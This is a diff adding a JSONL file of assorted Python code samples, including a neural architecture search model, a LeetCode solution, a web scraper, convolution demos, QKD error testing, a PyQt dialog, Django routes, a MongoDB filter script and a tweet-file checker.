diff --git "a/2741.jsonl" "b/2741.jsonl" new file mode 100644--- /dev/null +++ "b/2741.jsonl" @@ -0,0 +1,678 @@ +{"seq_id":"570805812","text":"import torch\nimport torch.nn as nn\n\ntry:\n import apex\nexcept:\n print('apex is not installed')\nfrom openselfsup.models import builder\nfrom openselfsup.models.registry import MODELS\n\n\n@MODELS.register_module\nclass SiameseSupernetsMBConv(nn.Module):\n \"\"\"Siamese Supernets for MBConv search space.\n\n BossNAS (https://arxiv.org/abs/2103.12424).\n\n Args:\n backbone (dict): Config dict for module of backbone ConvNet.\n neck (dict): Config dict for module of deep features to compact feature vectors.\n Default: None.\n head (dict): Config dict for module of loss functions. Default: None.\n pretrained (str, optional): Path to pre-trained weights. Default: None.\n base_momentum (float): The base momentum coefficient for the target network.\n Default: 0.996.\n \"\"\"\n\n def __init__(self,\n backbone,\n start_block,\n num_block,\n neck=None,\n head=None,\n pretrained=None,\n base_momentum=0.996,\n use_fp16=False,\n update_interval=None,\n **kwargs):\n super(SiameseSupernetsMBConv, self).__init__()\n\n self.start_block = start_block\n self.num_block = num_block\n\n self.online_backbone = builder.build_backbone(backbone)\n self.target_backbone = builder.build_backbone(backbone)\n self.backbone = self.online_backbone\n self.online_necks = nn.ModuleList()\n self.target_necks = nn.ModuleList()\n self.heads = nn.ModuleList()\n neck_in_channel_list = [cfg[0] for cfg in self.online_backbone.block_cfgs]\n for in_channel in neck_in_channel_list:\n neck['in_channels'] = in_channel\n self.online_necks.append(builder.build_neck(neck))\n self.target_necks.append(builder.build_neck(neck))\n self.heads.append(builder.build_head(head))\n\n for param in self.target_backbone.parameters():\n param.requires_grad = False\n for target_neck in self.target_necks:\n for param in target_neck.parameters():\n param.requires_grad = False\n\n self.init_weights(pretrained=pretrained)\n self.set_current_neck_and_head()\n\n self.base_momentum = base_momentum\n self.momentum = base_momentum\n self.forward_op_online = None\n self.forward_op_target = None\n self.best_paths = []\n self.optimizer = None\n self.use_fp16 = use_fp16\n self.update_interval = update_interval\n\n def init_weights(self, pretrained=None):\n \"\"\"Initialize the weights of model.\n\n Args:\n pretrained (str, optional): Path to pre-trained weights.\n Default: None.\n \"\"\"\n self.online_backbone.init_weights() # backbone\n for online_neck in self.online_necks:\n online_neck.init_weights(init_linear='kaiming') # projection\n\n for param_ol, param_tgt in zip(self.online_backbone.parameters(),\n self.target_backbone.parameters()):\n param_tgt.data.copy_(param_ol.data)\n for param_ol, param_tgt in zip(self.online_necks.parameters(),\n self.target_necks.parameters()):\n param_tgt.data.copy_(param_ol.data)\n # init the predictor in the head\n for head in self.heads:\n head.init_weights()\n\n def set_current_neck_and_head(self):\n self.online_neck = self.online_necks[self.start_block]\n self.target_neck = self.target_necks[self.start_block]\n self.head = self.heads[self.start_block]\n self.online_net = nn.Sequential(self.online_backbone, self.online_neck)\n self.target_net = nn.Sequential(self.target_backbone, self.target_neck)\n\n @torch.no_grad()\n def _momentum_update(self):\n \"\"\"Momentum update of the target network.\"\"\"\n for param_ol, param_tgt in zip(self.online_net.parameters(),\n self.target_net.parameters()):\n param_tgt.data = param_tgt.data * self.momentum + \\\n param_ol.data * (1. - self.momentum)\n\n @torch.no_grad()\n def momentum_update(self):\n self._momentum_update()\n\n @torch.no_grad()\n def _batch_shuffle_ddp(self, x):\n \"\"\"Batch shuffle, for making use of BatchNorm.\n\n *** Only support DistributedDataParallel (DDP) model. ***\n \"\"\"\n # gather from all gpus\n batch_size_this = x.shape[0]\n x_gather = concat_all_gather(x)\n batch_size_all = x_gather.shape[0]\n\n num_gpus = batch_size_all // batch_size_this\n\n # random shuffle index\n idx_shuffle = torch.randperm(batch_size_all).cuda()\n\n # broadcast to all gpus\n torch.distributed.broadcast(idx_shuffle, src=0)\n\n # index for restoring\n idx_unshuffle = torch.argsort(idx_shuffle)\n\n # shuffled index for this gpu\n gpu_idx = torch.distributed.get_rank()\n idx_this = idx_shuffle.view(num_gpus, -1)[gpu_idx]\n\n return x_gather[idx_this], idx_unshuffle\n\n @torch.no_grad()\n def _batch_unshuffle_ddp(self, x, idx_unshuffle):\n \"\"\"Undo batch shuffle.\n\n *** Only support DistributedDataParallel (DDP) model. ***\n \"\"\"\n # gather from all gpus\n batch_size_this = x.shape[0]\n x_gather = concat_all_gather(x)\n batch_size_all = x_gather.shape[0]\n\n num_gpus = batch_size_all // batch_size_this\n\n # restored index for this gpu\n gpu_idx = torch.distributed.get_rank()\n idx_this = idx_unshuffle.view(num_gpus, -1)[gpu_idx]\n\n return x_gather[idx_this]\n\n def forward_train(self, img, forward_singleop_online, idx=0, **kwargs):\n \"\"\"Forward computation during training.\n\n Args:\n img (Tensor): Input of two concatenated images of shape (N, 2, C, H, W).\n Typically these should be mean centered and std scaled.\n\n Returns:\n dict[str, Tensor]: A dictionary of loss components.\n \"\"\"\n assert img.dim() == 5, \\\n \"Input must have 5 dims, got: {}\".format(img.dim())\n\n v2_idx = img.shape[1] // 2\n img_v1 = img[:, idx, ...].contiguous()\n img_v2 = img[:, v2_idx + idx, ...].contiguous()\n if self.start_block > 0:\n for i, best_path in enumerate(self.best_paths):\n img_v1 = self.online_backbone(img_v1,\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n img_v2 = self.online_backbone(img_v2,\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n\n proj_online_v1 = self.online_neck(self.online_backbone(img_v1,\n start_block=self.start_block,\n forward_op=forward_singleop_online))[0]\n proj_online_v2 = self.online_neck(self.online_backbone(img_v2,\n start_block=self.start_block,\n forward_op=forward_singleop_online))[0]\n\n loss = self.head(proj_online_v1, self.proj_target_v2)['loss'] + \\\n self.head(proj_online_v2, self.proj_target_v1)['loss']\n\n return loss\n\n def forward_test(self, img, **kwargs):\n pass\n\n def forward(self, img, mode='train', **kwargs):\n if mode == 'train':\n return self.forward_train(img, **kwargs)\n elif mode == 'test':\n return self.forward_test(img, **kwargs)\n elif mode == 'extract':\n return self.backbone(img)\n elif mode == 'target':\n return self.forward_target(img, **kwargs)\n elif mode == 'single':\n return self.forward_single(img, **kwargs)\n else:\n raise Exception(\"No such mode: {}\".format(mode))\n\n @torch.no_grad()\n def forward_target(self, img, **kwargs):\n \"\"\"Forward computation during training.\n\n Args:\n img (Tensor): Input of two concatenated images of shape (N, 2, C, H, W).\n Typically these should be mean centered and std scaled.\n\n Returns:\n dict[str, Tensor]: A dictionary of loss components.\n \"\"\"\n assert img.dim() == 5, \\\n \"Input must have 5 dims, got: {}\".format(img.dim())\n\n img_v_l = []\n idx_unshuffle_v_l = []\n for idx in range(img.shape[1]):\n img_vi = img[:, idx, ...].contiguous()\n img_vi, idx_unshuffle_vi = self._batch_shuffle_ddp(img_vi)\n img_v_l.append(img_vi)\n idx_unshuffle_v_l.append(idx_unshuffle_vi)\n\n if self.start_block > 0:\n for idx in range(img.shape[1]):\n for i, best_path in enumerate(self.best_paths):\n img_v_l[idx] = self.target_backbone(img_v_l[idx],\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n\n self.forward_op_target = self.forward_op_online\n proj_target_v1 = 0\n proj_target_v2 = 0\n v2_idx = img.shape[1]//2\n with torch.no_grad():\n for op_idx, forward_singleop_target in enumerate(self.forward_op_target):\n temp_v1 = self.target_neck(self.target_backbone(img_v_l[op_idx],\n start_block=self.start_block,\n forward_op=forward_singleop_target))[\n 0].clone().detach()\n temp_v2 = self.target_neck(self.target_backbone(img_v_l[v2_idx + op_idx],\n start_block=self.start_block,\n forward_op=forward_singleop_target))[\n 0].clone().detach()\n temp_v1 = nn.functional.normalize(temp_v1, dim=1)\n temp_v1 = self._batch_unshuffle_ddp(temp_v1, idx_unshuffle_v_l[op_idx])\n\n temp_v2 = nn.functional.normalize(temp_v2, dim=1)\n temp_v2 = self._batch_unshuffle_ddp(temp_v2, idx_unshuffle_v_l[v2_idx + op_idx])\n\n proj_target_v1 += temp_v1\n proj_target_v2 += temp_v2\n\n self.proj_target_v1 = proj_target_v1 / (len(self.forward_op_target))\n self.proj_target_v2 = proj_target_v2 / (len(self.forward_op_target))\n\n def forward_single(self, img, forward_singleop, **kwargs):\n \"\"\"Forward computation during training.\n\n Args:\n img (Tensor): Input of two concatenated images of shape (N, 2, C, H, W).\n Typically these should be mean centered and std scaled.\n\n Returns:\n dict[str, Tensor]: A dictionary of loss components.\n \"\"\"\n img_v1 = img[:, 0, ...].contiguous()\n img_v2 = img[:, 1, ...].contiguous()\n\n if self.start_block > 0:\n for i, best_path in enumerate(self.best_paths):\n img_v1 = self.target_backbone(img_v1,\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n img_v2 = self.target_backbone(img_v2,\n start_block=i,\n forward_op=best_path,\n block_op=True)[0]\n\n self.target_neck(self.target_backbone(img_v1,\n start_block=self.start_block,\n forward_op=forward_singleop,\n block_op=True))\n self.target_neck(self.target_backbone(img_v2,\n start_block=self.start_block,\n forward_op=forward_singleop,\n block_op=True))\n\n self.online_neck(self.online_backbone(img_v1,\n start_block=self.start_block,\n forward_op=forward_singleop,\n block_op=True))\n self.online_neck(self.online_backbone(img_v2,\n start_block=self.start_block,\n forward_op=forward_singleop,\n block_op=True))\n\n\n# utils\n@torch.no_grad()\ndef concat_all_gather(tensor):\n \"\"\"Performs all_gather operation on the provided tensors.\n\n *** Warning ***: torch.distributed.all_gather has no gradient.\n \"\"\"\n tensors_gather = [\n torch.ones_like(tensor)\n for _ in range(torch.distributed.get_world_size())\n ]\n torch.distributed.all_gather(tensors_gather, tensor, async_op=False)\n\n output = torch.cat(tensors_gather, dim=0)\n return output\n","sub_path":"searching/bossnas/models/siamese_supernets/siamese_supernets_mbconv.py","file_name":"siamese_supernets_mbconv.py","file_ext":"py","file_size_in_byte":13474,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"228572417","text":"# -*- coding: utf-8 -*-\n# @Author : Jing\n# @FileName: 49. Group Anagrams.py\n# @IDE: PyCharm\n# https://leetcode.com/problems/group-anagrams/\n# Solution 1: classifier the array after sort.\n# Only when string sorted is the same as other,\n# they are group anagrams.\n# O(NKlogK)Time O(NK)Space\n# Solution 2: classifier by count.\n# Only when the number of every char occur in string is the same as other,\n# they are group anagrams.O(NK)Time O(NK)Space\n\n\nclass Solution:\n def groupAnagrams1(self, strs):\n if not strs:\n return strs\n dic = {}\n for s in strs:\n tmp_s = list(s)\n tmp_s = sorted(tmp_s)\n tmp_s = ''.join(tmp_s)\n if tmp_s not in dic :\n dic[tmp_s] = [s]\n else:\n dic[tmp_s].append(s)\n res = []\n for val in dic.values():\n res.append(val)\n return res\n\n def groupAnagrams2(self, strs):\n if not strs:\n return strs\n dic = {}\n for string in strs:\n count = [0 for _ in range(26)]\n for s in string:\n count[ord(s)-ord('a')] += 1\n count = tuple(count)\n if count not in dic:\n dic[count] = [string]\n else:\n dic[count].append(string)\n res = []\n for li in dic.values():\n res.append(li)\n return res\n\n\nif __name__ == '__main__':\n strings = [\"eat\", \"tea\", \"tan\", \"ate\", \"nat\", \"bat\"]\n s = Solution()\n print(s.groupAnagrams2(strings))\n\n\n\n\n","sub_path":"string/49. Group Anagrams.py","file_name":"49. Group Anagrams.py","file_ext":"py","file_size_in_byte":1558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"415282397","text":"from urllib.request import Request, urlopen\nfrom bs4 import BeautifulSoup\n\nreq = urlopen('https://www.10000recipe.com/recipe/6943674')\n\nprint(req.getcode())\n\nif req.getcode() == 200:\n html = req.read()\n #print(html)\n\n html = html.decode(\"utf-8\")\n #print(html)\nelse:\n print(\"HTTP ERROR\")\n\nsoup = BeautifulSoup(html, \"html.parser\")\n\nbody = soup.select(\"#stepDiv1 div\")\nbody1 = soup.select(\"#stepDiv2 div\")\nbody2 = soup.select(\"#stepDiv3 div\")\n\nprint(body ,body1 ,body2 , sep='\\n')","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":493,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"377502103","text":"\"\"\"\n1차원 Convolution, Cross-Correlation 연산\n\"\"\"\nimport numpy as np\n\n\ndef convolution_1d(x, w):\n \"\"\" x, w : 1d ndarray, len(x) >= len(w) \"\"\"\n w_r = np.flip(w)\n conv = []\n len_result = len(x) - len(w) + 1\n for i in range(len_result):\n x_sub = x[i:i+len(w)]\n fma = np.sum(x_sub * w_r)\n conv.append(fma)\n conv = np.array(conv)\n return conv\n\n\ndef cross_correlation_1d(x, w, convolution=False):\n \"\"\" x, w : 1d ndarray, len(x) >= len(w) \"\"\"\n if convolution == True:\n w = np.flip(w)\n\n conv = []\n len_result = len(x) - len(w) + 1\n for i in range(len_result):\n x_sub = x[i:i + len(w)]\n fma = np.sum(x_sub * w)\n conv.append(fma)\n conv = np.array(conv)\n return conv\n\n\nif __name__ == '__main__':\n np.random.seed(113)\n x = np.arange(1, 6)\n w = np.array([2, 1])\n w_r = np.flip(w)\n\n conv = []\n for i in range(4):\n x_sub = x[i:i+len(w)] # (0,1), (1,2), (2,3), (3,4)\n fma = np.sum(x_sub * w_r) # 1차원인 경우, np.dot(x_sub, w_r) 동일\n conv.append(fma)\n conv = np.array(conv)\n print('conv =', conv)\n print('conv =', convolution_1d(x, w))\n\n x = np.arange(1, 6)\n w = np.array([2, 0, 1])\n print('conv =', convolution_1d(x, w))\n\n # 교차상관(Cross-correlation)\n # 합성곱 연산과 다른 점은 w를 반전시키지 않는 것\n # CNN(Convolutional Neural Network, 합성곱 신경망)에서는 대부분 교차상관 사용\n\n cross_correlation = cross_correlation_1d(x, w)\n print('cross_correlation =', cross_correlation)","sub_path":"ch07/ex01_convolution1d.py","file_name":"ex01_convolution1d.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"502013084","text":"from random import choice\n\ndef testround(filt_count, filtered):\n test = []\n testindex = []\n filtered_update = []\n numberset = list(range(0, filt_count))\n if filt_count == 1:\n print(\"Not enough common basis to test, protocol will be aborted\")\n exit() \n else:\n for i in range(int(filt_count / 2)):\n rannum = choice(numberset)\n numberset.remove(rannum)\n testindex.append(rannum)\n test.append(filtered[rannum])\n for i in range(filt_count):\n if not i in testindex:\n filtered_update.append(filtered[i])\n else:\n continue\n return test, testindex, filtered_update\n\n\ndef testing(test_alice, test_bob, testindex, commonbasis, filtered, basis):\n counter = -1\n errors = 0\n errorh = 0\n for i in testindex:\n counter += 1\n if not test_alice[counter] == test_bob[counter]:\n if basis[commonbasis[i]] == 0:\n errors += 1\n elif basis[commonbasis[i]] == 1:\n errorh += 1\n return errors, errorh\n\n\ndef update_filtered(testindex, filtered):\n filtered_update = []\n for i in range(len(filtered)):\n if not i in testindex:\n filtered_update.append(filtered[i])\n else:\n continue\n return filtered_update\n\n\ndef errorconversion(e_s, e_h, test):\n e_t = round(((e_s + e_h) / len(test)) * 100, 2)\n e_s2 = 0;\n e_h2 = 0\n\n if not e_t == 0:\n e_s2 = (e_s / (e_s + e_h)) * 100\n e_h2 = (e_h / (e_s + e_h)) * 100\n return e_t, round(e_s2, 2), round(e_h2, 2)\n","sub_path":"qkd/noise.py","file_name":"noise.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"323886108","text":"# -*- coding: utf-8 -*-\n\n\nfrom PyQt5 import QtCore, QtGui, QtWidgets\nfrom config.translations import Translations\nfrom config.icons_pics import Icons, Pics\nfrom config import config\n\n\nclass ui_dialog_about(object):\n def setupUi(self, DialogAbout):\n DialogAbout.setObjectName(\"DialogAbout\")\n DialogAbout.resize(400, 446)\n icons = Icons()\n DialogAbout.setWindowIcon(QtGui.QIcon(icons.actionAboutIcon))\n sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred,\n QtWidgets.QSizePolicy.Preferred)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n DialogAbout.sizePolicy().hasHeightForWidth())\n DialogAbout.setSizePolicy(sizePolicy)\n DialogAbout.setMinimumSize(QtCore.QSize(400, 446))\n DialogAbout.setMaximumSize(QtCore.QSize(400, 446))\n self.lblLogo = QtWidgets.QLabel(DialogAbout)\n self.lblLogo.setGeometry(QtCore.QRect(140, 70, 121, 20))\n self.lblLogo.setObjectName(\"lblLogo\")\n self.lblAppVersion = QtWidgets.QLabel(DialogAbout)\n self.lblAppVersion.setGeometry(QtCore.QRect(10, 160, 381, 41))\n font = QtGui.QFont()\n font.setPointSize(24)\n font.setBold(True)\n font.setWeight(75)\n self.lblAppVersion.setFont(font)\n self.lblAppVersion.setTextFormat(QtCore.Qt.RichText)\n self.lblAppVersion.setScaledContents(False)\n self.lblAppVersion.setAlignment(QtCore.Qt.AlignCenter)\n self.lblAppVersion.setObjectName(\"lblAppVersion\")\n self.lblAppDesc = QtWidgets.QLabel(DialogAbout)\n self.lblAppDesc.setGeometry(QtCore.QRect(10, 210, 381, 51))\n self.lblAppDesc.setAlignment(QtCore.Qt.AlignCenter)\n self.lblAppDesc.setWordWrap(True)\n self.lblAppDesc.setObjectName(\"lblAppDesc\")\n self.lblCopyright = QtWidgets.QLabel(DialogAbout)\n self.lblCopyright.setGeometry(QtCore.QRect(10, 270, 381, 51))\n font = QtGui.QFont()\n font.setPointSize(9)\n self.lblCopyright.setFont(font)\n self.lblCopyright.setAlignment(\n QtCore.Qt.AlignHCenter\n | QtCore.Qt.AlignTop)\n self.lblCopyright.setWordWrap(True)\n self.lblCopyright.setObjectName(\"lblCopyright\")\n\n self.retranslate_ui(DialogAbout)\n QtCore.QMetaObject.connectSlotsByName(DialogAbout)\n\n def retranslate_ui(self, DialogAbout):\n lingo = Translations()\n pics = Pics()\n this_config = config.Config()\n _translate = QtCore.QCoreApplication.translate\n DialogAbout.setWindowTitle(_translate(\"DialogAbout\",\n lingo.load(\"DialogAbout\")\n + \" \"\n + this_config.APP_NAME, None))\n self.lblAppVersion.setText(_translate(\"DialogAbout\",\n this_config.APP_NAME\n + \" \"\n + this_config.APP_VERSION, None))\n self.lblAppDesc.setText(_translate(\"DialogAbout\",\n this_config.APP_NAME\n + \" \" + lingo.load(\"lblAppDesc\"),\n None))\n self.lblCopyright.setText(_translate(\"DialogAbout\",\n \"\"\n + \"

\"\n + lingo.load(\"lblCopyright\")\n + \"
\"\n + this_config.APP_WEBSITE\n + \"

\",\n None))\n\n self.lblLogo.resize(250, 250)\n mastodome_mascot = QtGui.QPixmap(\n pics.aboutMascoutImg).scaled(\n self.lblLogo.size())\n self.lblLogo.setPixmap(mastodome_mascot)\n self.lblLogo.move(75, 20)\n self.lblAppVersion.move(10, 280)\n self.lblAppDesc.move(10, 310)\n self.lblCopyright.move(10, 360)\n","sub_path":"gui/about.py","file_name":"about.py","file_ext":"py","file_size_in_byte":4677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"381300163","text":"\"\"\"\nUrls\n\"\"\"\nfrom django.conf.urls import url\nfrom . import views\n\n\nurlpatterns = [\n url(r'^searching$', views.search, name='search'),\n url(r'^(?P[0-9]+)/$', views.detail, name='detail'),\n url(r'^register_substitut$', views.register_substitut, name='register_substitut'),\n url(r'^account$', views.account, name='account'),\n url(r'^legal$', views.legal, name='legal'),\n url(r'^results', views.results, name='results'),\n url(r'^mysubstitutes', views.mysubstitutes, name='mysubstitutes'),\n url(r'^category-autocomplete/$',\n views.CategoryAutocomplete.as_view(), name='category-autocomplete', ),\n]\n","sub_path":"substitute/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"380880260","text":"import sys\nimport re\nimport pymongo\nimport json\nimport datetime\n\nclient = pymongo.MongoClient(host=\"da1.eecs.utk.edu\")\n\nDB = sys.argv[1]\nCOLL = sys.argv[2]\nfield = sys.argv[3]\n# allow multiple comma seperated targets simultaneoulsy, up to 2 maybe..\nTARGETS = sys.argv[4]\ntargets = map(lambda x: x.replace('.', '\\\\\\.'), TARGETS.split(','))\n\n\nif len(sys.argv) < 5:\n sys.exit('unexpected number of inputs')\nelif len(sys.argv) == 5:\n excludes = []\nelse:\n excludes = sys.argv[5:]\n\n\n# stdin assumes project + ';' + timestamp\ndef unixtime2timestamp(tmp):\n return datetime.datetime.fromtimestamp(int(tmp)).strftime('%Y-%m-%dT%H-%M-%S.500')\n\n\nprj2timestamp = {}\nfor line in sys.stdin:\n items = line.strip().split(';')\n prj = items[0]\n timestamp = unixtime2timestamp(items[1])\n prj2timestamp[prj] = timestamp\n\n\ndb = client[DB]\ncoll = db[COLL]\ncoll2 = db['Posts_title_' + TARGETS]\n#coll2 = db['Posts_titletidy_readr_tibble']\n# assume we only concern about questions, ignore answers\n\n# print(targets)\n#targets[0] = targets[0].replace('.', '\\.')\n\ntarget = '|'.join(targets)\nprint(target)\n\nfor prj in prj2timestamp:\n if len(excludes) != 0:\n results = coll.find({field: {'$regex': target, '$not': re.compile(excludes[0]), '$options': 'i'},\n 'PostTypeId': '1'}, {'_id': 0})\n else:\n results = coll.find({field: {'$regex': target, '$options': 'i'},\n 'PostTypeId': '1'}, {'_id': 0})\n\n for i in results:\n if int(i['Score']) > 0:\n # convert to int\n i['Score'] = int(i['Score'])\n i['CommentCount'] = int(i['CommentCount'])\n i['AnswerCount'] = int(i['AnswerCount'])\n i['ViewCount'] = int(i['ViewCount'])\n coll2.insert(i)\n\n # coll2.insert(i)\n","sub_path":"scripts/filterouttiydplusdatatable.py","file_name":"filterouttiydplusdatatable.py","file_ext":"py","file_size_in_byte":1801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"231196001","text":"# Alexandros Gidarakos - https://www.linkedin.com/in/alexandrosgidarakos\n# My solution to MITx 6.00.1x Lecture 6 Problem 2\n\ndef oddTuples(aTup):\n '''\n aTup: a tuple\n\n returns: tuple, every other element of aTup.\n '''\n\n result = ()\n\n for i in range(0, len(aTup), 2):\n result += (aTup[i],)\n\n return result\n\nprint(oddTuples((1, 2, 3, 4, 5, 6, 7)))\n","sub_path":"lecture-6/lecture-6-problem-2.py","file_name":"lecture-6-problem-2.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"340734300","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport sys\nfrom six import print_\nfrom six.moves import input\n\ntotal = 0\nfor present in sys.stdin:\n l, w, h = map(int, present.split(\"x\"))\n a = l * w\n b = w * h\n c = h * l\n smallest = min([a, b, c])\n total += 2 * a + 2 * b + 2 * c + smallest\nprint_(\"{} ft²\".format(total))\n","sub_path":"day2-1.py","file_name":"day2-1.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"455023035","text":"# -*- coding: utf-8 -*-\r\nimport socket\r\nimport threading\r\nimport access\r\nHOST = ''\r\nPORT = 50007\r\nrpiaddr = ''\r\nrpiconn = None\r\ntoken = b'thisisraspberrypi'\r\n\r\n\r\ndef rpi_listener():\r\n global rpiaddr,rpiconn\r\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n s.bind((HOST, PORT))\r\n s.listen(1)\r\n while True:\r\n conn, addr = s.accept()\r\n print('Connected by', addr)\r\n access.intiative_send_msg('ov7o7t9E4Jbjl8CVaImoBl2oNDMI', '远程接入', 'text')\r\n conn.settimeout(55)\r\n while True:\r\n try:\r\n data = conn.recv(1024)\r\n except Exception as e:\r\n print('there is a socket error::',e)\r\n conn.close()\r\n access.intiative_send_msg('ov7o7t9E4Jbjl8CVaImoBl2oNDMI', '树莓派断线', 'text')\r\n break\r\n if data == token:\r\n print('data:', data)\r\n rpiaddr = addr[0]\r\n rpiconn = conn\r\n conn.send(b'thisisserver')\r\n else:\r\n print('attention error token:::',data)\r\n access.intiative_send_msg('ov7o7t9E4Jbjl8CVaImoBl2oNDMI', '收到了奇怪的接入口令:'+ data, 'text')\r\n if data == '':\r\n break\r\n\r\n conn.close()\r\n\r\n\r\ndef start_listen():\r\n t = threading.Thread(target=rpi_listener)\r\n t.setDaemon(True)\r\n t.start()\r\n return","sub_path":"Server plugin/rpi_addr_listener.py","file_name":"rpi_addr_listener.py","file_ext":"py","file_size_in_byte":1422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"578981259","text":"import FWCore.ParameterSet.Config as cms\n\n#\n# module for b-tag study\n#\n\n\nanalyzeBtags = cms.EDAnalyzer(\"BtagAnalyzer\",\n ## collections of RA4b objects\n jets = cms.InputTag(\"goodJets\"),\n bjets = cms.InputTag(\"mediumTrackHighEffBjets\"),\n muons = cms.InputTag(\"goodMuons\"),\n electrons = cms.InputTag(\"goodElectrons\"),\n met = cms.InputTag(\"patMETsPF\"),\n ## collections of matched objects\n matchedLightJets = cms.InputTag(\"matchedLightJets\"),\n matchedBjets = cms.InputTag(\"matchedBjets\"),\n ## for event and jet weighting\n PVSrc = cms.InputTag(\"offlinePrimaryVertices\"),\n PUInfo = cms.InputTag(\"addPileupInfo\"),\n PUWeight = cms.InputTag(\"eventWeightPU:eventWeightPU\"),\n RA2Weight = cms.InputTag(\"weightProducer:weight\"),\n BtagEventWeights = cms.InputTag(\"btagEventWeight:RA4bEventWeights\"),\n BtagJetWeights = cms.InputTag(\"btagEventWeight:RA4bJetWeights\"),\n BtagJetWeightsGrid = cms.InputTag(\"BtagEventWeight:RA4bJetWeightsGrid\"),\n BtagEventWeightsGrid = cms.InputTag(\"btagEventWeight:RA4bJetWeightsGrid\"),\n BtagEffGrid = cms.InputTag(\"btagEventWeight:effBTagEventGrid\"),\n ## ...\n ## bool \n useEventWeight = cms.bool(False),\n useBtagEventWeight = cms.bool(False),\n ## 0: 0 btags, 1: 1 btag; 2: 2 btags, 3: 3 or more btags \n btagBin = cms.int32(0)\n )\n","sub_path":"Btagging/BtagAnalyzer/python/BtagAnalyzer_cfi.py","file_name":"BtagAnalyzer_cfi.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"37655910","text":"#!/usr/bin/env python\n# coding=utf-8\nimport codecs\nimport datetime\nfrom glob import glob\nimport os\nimport re\n\nclass Tester:\n \"\"\"\n Test all the text files to ensure:\n * Tweets are all in order - within each file the most recent should\n be first.\n * All Tweets should be <= 280 characters in length.\n\n Outputs a report listing all errors.\n \"\"\"\n\n def __init__(self):\n\n self.project_root = os.path.abspath(os.path.dirname(__file__))\n\n # Will be a list of dicts:\n self.errors = []\n\n def start(self):\n\n # Cycle through every directory in /tweets/ whose name is four digits:\n for d in glob('{}/tweets/{}'.format(self.project_root, '[0-9]' * 4)):\n for f in os.listdir(d):\n # Test every .txt file:\n if f.endswith('.txt'):\n self.test_file(\n os.path.join(self.project_root, 'tweets', d, f))\n\n last_file = None\n\n # Output all errors, if any.\n if len(self.errors) == 0:\n print(\"\\nEverything is OK.\")\n else:\n for err in self.errors:\n # err has 'filepath', 'time' and 'text' elements.\n if last_file is None or last_file != err['filepath']:\n # eg 'FILE: 1660/01.txt'\n dir_file = '/'.join(err['filepath'].split('/')[-2:])\n print(\"\\nFILE tweets/{}\".format(dir_file))\n\n print(\" {}: {}\".format(err['time'], err['text']).encode('utf-8'))\n\n last_file = err['filepath']\n\n\n def test_file(self, filepath):\n \"Test an individual file.\"\n\n f = codecs.open(filepath, 'r', 'utf-8')\n\n prev_time = None\n\n for line in f:\n line = line.strip()\n if line != '':\n # Use same match as in tweeter.py, and only test matching lines.\n line_match = re.match(\n '^(\\d{4}-\\d{2}-\\d{2}\\s\\d{2}\\:\\d{2})\\s(.*?)$', line)\n\n if line_match:\n [tweet_time, tweet_text] = line_match.groups()\n\n t = datetime.datetime.strptime(tweet_time, '%Y-%m-%d %H:%M')\n\n if prev_time is not None:\n if t > prev_time:\n self.add_error(\n filepath,\n tweet_time,\n \"Time is after previous time ({}).\".format(prev_time))\n elif t == prev_time:\n self.add_error(\n filepath,\n tweet_time,\n \"Time is the same as previous time ({}).\".format(prev_time))\n if len(tweet_text) > 280:\n self.add_error(\n filepath,\n tweet_time,\n \"Tweet is {} characters long.\".format(len(tweet_text)))\n\n prev_time = t\n f.close()\n\n def add_error(self, filepath, dt, txt):\n self.errors.append({\n 'filepath': filepath,\n 'time': dt,\n 'text': txt\n })\n\n\ndef main():\n tester = Tester()\n\n tester.start()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"298139905","text":"from selenium import webdriver\nimport time\n\noptions = webdriver.ChromeOptions()\nprefs = {\n \"download.default_directory\": \"C:\\\\MyNewFolder\",\n \"download.prompt_for_download\": False,\n \"download.directory_upgrade\": True\n }\noptions.add_experimental_option('prefs', prefs)\ndriver = webdriver.Chrome(options=options)\n\n\ndriver.get(\"https://docs.google.com/presentation/d/1n2TEPRiaRajUODFNNbNQCfKIwnSViLia8G9PWSlMAow/export/pptx\")\ntime.sleep(1)\ndriver.quit()\n","sub_path":"python/change_download_folder_chrome.py","file_name":"change_download_folder_chrome.py","file_ext":"py","file_size_in_byte":467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} 